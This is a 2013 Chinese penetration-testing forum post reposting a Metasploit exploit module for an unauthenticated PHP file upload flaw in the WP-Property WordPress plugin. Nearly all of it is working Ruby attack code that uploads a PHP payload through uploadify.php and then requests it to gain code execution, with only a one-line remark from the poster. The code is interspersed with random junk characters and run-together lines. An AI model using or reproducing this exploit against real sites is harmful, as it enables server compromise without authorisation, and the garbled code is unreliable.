中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
* ]! ~1 J2 M' s
9 k; J5 l4 j' r4 O: f0 Q& k: d ## # This file is part of the Metasploit Framework and may be subject to$ v- k6 C: u  m* k

& I( m% ?: |( P+ t# redistribution and commercial restrictions. Please see the Metasploit; t- [3 v3 y  l- L" u7 l  i' Z  g
2 D. `( q! @* b- @' u, w( V
# Framework web site for more information on licensing and terms of use.
1 n1 C# c) U( y9 N# K3 M1 O6 p6 u. X- m
#   http://metasploit.com/framework/ ##
; }' l! X9 \# n0 h+ P/ G; Y. s# K6 n3 u% ~9 N' \3 R

' n; Y7 `5 l1 j' \! e% a
  ~" c: [" ^4 x' \7 c   `& c- M' G+ ~4 N- Z

2 ~- c/ [6 z! P: U( _9 x4 Z3 Irequire 'msf/core'
' T" m+ I/ M* M; J! Nrequire 'msf/core/exploit/php_exe'
2 q6 b, d& o* J+ v  o$ c6 a  Z! j$ a- m2 u& r
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',! V4 e* {, B) U. ?0 B0 i
'Description'    => %q{
% t, W$ B% B) O* Z9 FThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
9 C* q8 {- H) _# R[
6 O& v$ r/ j! X4 F4 P* N. r'Sammy FORGIT', # initial discovery
, m, T6 ~1 t% x! @" `% p3 G'James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ g' t! Z7 z3 o! P  M],! F$ E+ ~1 K5 M' b
'License'        => MSF_LICENSE," H( D6 e, b* E8 V7 A/ c. p
'References'     =>
/ l  }+ R1 P/ C$ B) q[9 J- w! z1 ~0 ^7 S) s3 q' m2 X# `2 ~
[ 'OSVDB', '82656' ],
' V- u; j: h% z" \5 S[ 'BID', '53787' ],: k$ Z0 R/ u7 S9 o+ l
[ 'EDB', '18987'],5 n' ^2 ]: A) i% L/ d: A
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
9 H9 O' L$ j! {% U, V2 T) c  N7 k],
% a/ `* y) g! ]8 R+ M'Payload'        =>. J4 G% R4 T: V% c9 I7 m2 [3 ~6 J
{
/ p, B4 L: ?+ Z'BadChars' => "\x00",3 r  K; x, f+ V
},( |7 u5 ~" |3 ?3 r& x: r  ]4 }* W1 W9 R
'Platform'       => 'php',2 c8 N8 T3 g+ X) U; m) S; @
'Arch'           => ARCH_PHP,
4 q# M5 s0 e8 F- H2 g& h& X- J'Targets'        =>
) }" p9 t* Z/ T0 S' J% e[
: H: L+ g) ^" z' S# z7 K[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
7 \. O% E9 @* R5 W9 Z, N) |[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
0 P$ E3 q: w' C( D],
$ s7 ^& Z/ H; _0 o$ W'DefaultTarget'  => 0,
$ p7 s# c6 o* r0 d/ n+ [" c; z'DisclosureDate' => 'Mar 26 2012'))
$ U+ T! d5 X" ?  _- T; m+ H
) O/ f" h  X: M! z* Tregister_options(
5 b- [+ U0 e# s# ~" k[8 z  r% ~* g( n. [
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 L4 ~+ ~. Y4 r# ]) c
], self.class)
" {0 g1 u1 T" R* B  ^, n# jend! K( P1 c8 p1 I) y: c7 b; j8 d0 v

4 f5 }, w3 w; O) mdef check# H6 B! w7 i4 p( E
uri =  target_uri.path$ Q7 M, ~* m5 ]* Y8 p' ~
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',* e4 y$ q8 U- s0 H
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"( V3 K7 u' y5 z8 X
})
8 x7 W" e, |: p+ D; m7 N( ]
8 ?7 i: r+ Z, U" ^6 Lif not res or res.code != 200
. f( {% r4 c1 Preturn Exploit::CheckCode::Unknown
9 E4 r9 S2 X' C; J1 o8 G2 [end2 P! T, }3 V! E7 g. |
2 C! V5 o* M: @# ?1 {; y
return Exploit::CheckCode::Appears
4 M4 d1 W+ ^# n4 U4 R' z/ cend
5 A4 M: E! k! \1 M- a
( u7 h/ H3 E  i( I! [, rdef exploit
" \; I5 u9 R# [uri =  target_uri.path( b& @9 y* \" m- g2 W# s% W
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
6 ?/ p/ Q3 B7 ?6 L& S8 H/ J
6 Q9 n6 x. G# Ydata = Rex::MIME::Message.new+ S% f- {- q5 ]2 Y  p: r  M
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")- S9 T; o* \6 T+ Q9 n9 S# s
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
: N0 x7 P. V1 b+ J8 S. Q4 \# xpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 M6 p# E  U6 C$ p1 p, N$ o3 ^
/ I( u0 g9 ]  F7 y, Bprint_status("#{peer} - Uploading payload #{@payload_name}")3 E. m! z5 H; t9 U! W- \
res = send_request_cgi({0 r9 B  t$ A- X
'method' => 'POST',0 `3 x- g2 U) X/ P, U$ q& Q
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
2 Z6 V% m5 r. j, F$ C'ctype'  => "multipart/form-data; boundary=#{data.bound}",& F+ }2 U: v! L* l- X* j
'data'   => post_data/ ^1 X; b2 E; H6 V) h6 D9 E7 I
})
! V; V# s# B  \- i$ r( R/ P' w% r( W2 s7 D& O' |4 w  G; q
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
1 z  H6 e; {) f. z3 qfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% W7 z4 X, M) Y! i6 q
end
  {! M0 U) ]+ Y+ `8 h+ C7 T  R0 W% ~* w! n6 n6 v
upload_uri = res.body4 k8 q  V! M3 H+ A  r. T

  G- Z6 e& O* }5 U6 vprint_status("#{peer} - Executing payload #{@payload_name}")3 n5 [% d/ j  T8 W& O# X
res = send_request_raw({: A! y8 m7 E4 u; E/ p% n; z/ @
'uri'    => upload_uri,# J8 ~6 O6 _* t, x
'method' => 'GET'
  T3 L, u% T; ~# r, e})( B) |) s# \' ^6 j
end
! c4 e& o2 M/ gend
+ M- f# B% g& N1 P- T
+ p! F: g% z& o6 W不要问我这写的是什么 怎么利用 我是说msf.# V& {' h/ l8 T& ?* k$ L- k

+ ?. h  @" k. f& U6 V, B* @5 \; F6 S



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2